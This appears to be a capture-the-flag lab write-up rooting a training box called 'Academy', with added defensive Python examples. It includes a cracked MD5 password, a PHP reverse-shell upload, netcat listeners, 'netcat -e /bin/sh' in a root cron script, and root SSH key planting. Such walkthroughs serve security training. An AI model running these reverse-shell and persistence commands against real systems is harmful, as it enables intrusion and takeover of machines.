TP02-Academy

Academy - 192.168.20.111

nmap -Pn 192.168.20.111 -sV   
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-20 11:29 CEST
Nmap scan report for 192.168.20.111
Host is up (0.0064s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

ftp://192.168.20.111/ http://192.168.20.111/

gobuster dir -u http://192.168.20.111 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.20.111
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/10/20 11:38:50 Starting gobuster in directory enumeration mode
===============================================================
/academy              (Status: 301) [Size: 318] [--> http://192.168.20.111/academy/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.20.111/phpmyadmin/]
/server-status        (Status: 403) [Size: 279]                                        
                                                                                       
===============================================================
2021/10/20 11:39:45 Finished
===============================================================

ftp://192.168.20.111/note.txt

Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.


I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:

INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');

The StudentRegno number is what you use for login.


Let me know what you think of this open-source project, it's from 2020 so it should be secure... right?
We can always adapt it to our needs.

-jdelta
┌──(tbr㉿kali-tbr)-[~]
└─$ gobuster dir -u http://192.168.20.111/academy -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.20.111/academy
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/10/20 11:45:03 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 324] [--> http://192.168.20.111/academy/admin/]
/assets               (Status: 301) [Size: 325] [--> http://192.168.20.111/academy/assets/]
/includes             (Status: 301) [Size: 327] [--> http://192.168.20.111/academy/includes/]
/db                   (Status: 301) [Size: 321] [--> http://192.168.20.111/academy/db/]      
                                                                                             
===============================================================
2021/10/20 11:46:13 Finished
===============================================================

https://crackstation.net/

cd73502828457d15655bbd7a63fb0bc8 -> student
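The lookup works because the CMS stores an unsalted MD5 of the password, so any precomputed table maps the digest straight back to the word. The following added Python example (mine, not the Academy CMS code) reproduces that lookup against a small constructed wordlist and shows the storage scheme that defeats it: a random per-user salt with a memory-hard KDF (scrypt from the standard library), compared in constant time. Function names, the wordlist and the scrypt parameters are my own choices.

```python
import hashlib
import hmac
import os

# Added example, not the Academy CMS code. The note.txt row stores an unsalted
# MD5, so a precomputed table maps the digest straight back to the password.

LEGACY_MD5 = "cd73502828457d15655bbd7a63fb0bc8"       # value from note.txt on the page

# Constructed stand-in for a large lookup table such as crackstation's.
COMMON_WORDS = ["password", "123456", "student", "academy", "admin"]


def md5_lookup(hexdigest, wordlist):
    """Reverse an unsalted MD5 by table lookup; None if it is not in the table."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return table.get(hexdigest.lower())


# Replacement scheme: random per-user salt + memory-hard KDF, one string per row.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)     # about 16 MiB of memory per hash


def hash_password(password, salt=None):
    """Return 'scrypt$<salt hex>$<key hex>'; a fresh salt unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${key.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, salt_hex, key_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(key, bytes.fromhex(key_hex))


if __name__ == "__main__":
    print("legacy hash recovered as:", md5_lookup(LEGACY_MD5, COMMON_WORDS))
    stored = hash_password("student")
    print("new format:", stored)
    print("verify ok:", verify_password("student", stored))
```

With the salted scheme the same password produces a different row for every user, so a leaked table no longer gives a one-query answer, and the scrypt cost makes bulk guessing slow even for a dedicated attacker.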

http://192.168.20.111/academy/ Log in with that user and upload an image in order to execute code wrapped in PHP in place of the image: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Leave a terminal waiting with the command nc -nlvp 1234, which listens on port 1234 [Netcat: used to open ports and communicate between machines]. Edit the file so it points to our IP, then upload it in place of the account's avatar image.
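The foothold depends on the avatar upload accepting a PHP file in place of an image. As an added example (mine, not the CMS's upload handler), here are the server-side checks an upload endpoint should apply before writing anything under the web root: an extension allowlist, leading bytes that match the declared type, a size cap, and rejection of any PHP open tag in the body. Function names, the allowed types and the size limit are assumptions.

```python
import os
import re

# Added example, not the Academy CMS's upload handler. Server-side checks an
# avatar upload endpoint should apply before anything is written under the web root.

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}       # assumption: only raster avatars
MAGIC = {                                             # leading bytes per type
    ".png":  [b"\x89PNG\r\n\x1a\n"],
    ".jpg":  [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif":  [b"GIF87a", b"GIF89a"],
}
MAX_BYTES = 512 * 1024                                # assumption: 512 KiB cap
PHP_OPEN_TAG = re.compile(rb"<\?")                    # catches <?php, <?= and short tags


def validate_avatar(filename, data):
    """Return (ok, reason). Accepts only a small file whose bytes match the
    declared image type and that carries no PHP open tag anywhere."""
    # Only the last extension decides: "x.png.php" is .php and is rejected.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match declared image type"
    # A valid PNG/JPEG with PHP appended (or hidden in a comment chunk) still fails here.
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def safe_storage_name(student_regno, ext):
    """Server-chosen file name: the client's file name is never reused on disk."""
    return f"{int(student_regno)}{ext}"


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and a PNG header with PHP appended.
    print(validate_avatar("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(validate_avatar("avatar.png", b"\x89PNG\r\n\x1a\n<?php ?>"))
    print(validate_avatar("avatar.php", b"<?php ?>"))
```

These checks belong with two deployment measures: store uploads outside the document root (or, under Apache mod_php, set `php_admin_flag engine off` for the upload directory), and re-encode the image through an image library so that nothing from the original byte stream survives.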

┌──(tbr㉿kali-tbr)-[~]
└─$ nc -nlvp 1234             
listening on [any] 1234 ...
connect to [192.168.20.103] from (UNKNOWN) [192.168.20.111] 51562
Linux academy 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
 08:17:43 up  2:54,  1 user,  load average: 0.05, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     -                05:23    2:51m  0.06s  0.04s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')" || python -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/$ 
www-data@academy:/home$ cd /tmp 
cd /tmp
www-data@academy:/tmp$ ls
ls
www-data@academy:/tmp$ ll
ll
bash: ll: command not found
www-data@academy:/tmp$ ls -al
ls -al
total 8
drwxrwxrwt  2 root root 4096 Oct 20 08:17 .
drwxr-xr-x 18 root root 4096 May 29 13:02 ..
www-data@academy:/tmp$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
<.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
--2021-10-20 08:51:34--  https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 477235 (466K) [text/plain]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 466.05K  --.-KB/s    in 0.1s    

2021-10-20 08:51:40 (4.69 MB/s) - ‘linpeas.sh’ saved [477235/477235]

www-data@academy:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@academy:/tmp$ ./linpeas.sh

linpeas reports a vulnerability in a CRON job that runs a backup.sh file as root every minute:

rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
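linpeas flags this because a script that root's cron runs every minute can be edited by a non-root user. As an added example (mine, not linpeas output or a file from the box), the Python audit below parses /etc/crontab-style entries and reports root jobs whose script, or the directory holding it, is writable by someone other than root, which is exactly the condition that turns backup.sh into a privilege escalation path. The sample data is constructed: the location /home/grimmie/backup.sh is an assumption, since the page does not say where the script lives.

```python
import os
import shlex
import stat

# Added example, not linpeas output or a file from the box: audit root cron jobs
# whose script (or the directory holding it) a non-root user could modify.


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines: 5 time fields, user, command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        yield fields[5], fields[6]


def script_path(command):
    """First word of the command line, which is what cron actually executes."""
    try:
        return shlex.split(command)[0]
    except (ValueError, IndexError):
        return None


def writable_by_non_root(uid, gid, mode):
    """True if someone other than root could write the object."""
    if uid != 0:
        return True                       # owner is not root, so the owner can edit it
    if mode & stat.S_IWOTH:
        return True                       # world-writable
    return bool(mode & stat.S_IWGRP) and gid != 0   # group-writable with a non-root group


def audit_root_cron(crontab_text, stat_lookup):
    """stat_lookup(path) -> (uid, gid, mode), or None if the path is missing.
    Returns a list of (path-or-command, reason) findings for jobs run as root."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = script_path(command)
        if not path or not path.startswith("/"):
            findings.append((command, "command is not an absolute path; review manually"))
            continue
        info = stat_lookup(path)
        if info is None:
            findings.append((path, "script missing: whoever can create it runs as root"))
            continue
        if writable_by_non_root(*info):
            findings.append((path, "script writable by non-root user"))
        parent = stat_lookup(os.path.dirname(path))
        # A writable parent lets the script be replaced, unless the sticky bit protects it.
        if parent and writable_by_non_root(*parent) and not (parent[2] & stat.S_ISVTX):
            findings.append((path, "parent directory writable by non-root user"))
    return findings


def stat_lookup_fs(path):
    """Live-filesystem backend for audit_root_cron."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_gid, st.st_mode


# Constructed sample; the backup.sh location is an assumption, the page does not give it.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root /home/grimmie/backup.sh
0 3 * * * root /usr/local/sbin/rotate-logs.sh
"""
SAMPLE_FS = {                                 # path -> (uid, gid, mode)
    "/home/grimmie/backup.sh":        (1000, 1000, 0o100755),  # owned by grimmie
    "/home/grimmie":                  (1000, 1000, 0o040755),
    "/usr/local/sbin/rotate-logs.sh": (0, 0, 0o100755),        # root-owned, fine
    "/usr/local/sbin":                (0, 0, 0o040755),
}

if __name__ == "__main__":
    for item, reason in audit_root_cron(SAMPLE_CRONTAB, SAMPLE_FS.get):
        print(f"{item}: {reason}")
```

On a live host, call `audit_root_cron(open("/etc/crontab").read(), stat_lookup_fs)` and repeat for each file in /etc/cron.d. The fix is the mirror image of the finding: root's scheduled scripts must be owned by root, mode 0755 or tighter, in a root-owned directory.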

We look in the includes folder to see whether it holds any useful information:

$ cd var/www/html/academy/includes

$ ls
config.php
footer.php
header.php
menubar.php

$ cat config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>

Connect over SSH as grimmie: the database password from config.php is also the password of the local account. Edit backup.sh so that it runs a command that opens a remote shell via netcat:

netcat -e /bin/sh 192.168.20.103 1234

On Kali, also open a listener, which the remote machine will connect back to on the next run of the CRON job:

nc -nlvp 1234        

Another option is to generate an SSH key on Kali and push the public key into root's SSH authorized keys:

└─$ ssh-keygen -t rsa
└─$ cat .ssh/id_rsa.pub
ssh-rsa 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 tbr@kali-tbr
                       

Then edit backup.sh so that it installs the key into the remote machine's SSH configuration:

# create the directory, since it does not exist yet
mkdir /root/.ssh
# install the key
echo "ssh-rsa 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 tbr@kali-tbr" >> ~/.ssh/authorized_keys

# adjust the SSH config to make sure a public key can be used to log in
sed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config

# set a flag to confirm the script ran, via an echo over netcat
echo "Connexion OK " | netcat 192.168.20.103 1234

Ta-da!

┌──(tbr㉿kali-tbr)-[/var]
└─$ nc -nlvp 1234                                                                                                                                                                        1 ⨯
listening on [any] 1234 ...
connect to [192.168.20.103] from (UNKNOWN) [192.168.20.111] 51580
ls
flag.txt
cat flag.txt
Congratz you rooted this box !
Looks like this CMS isn't so secure...
I hope you enjoyed it.
If you had any issue please let us know in the course discord.

Happy hacking !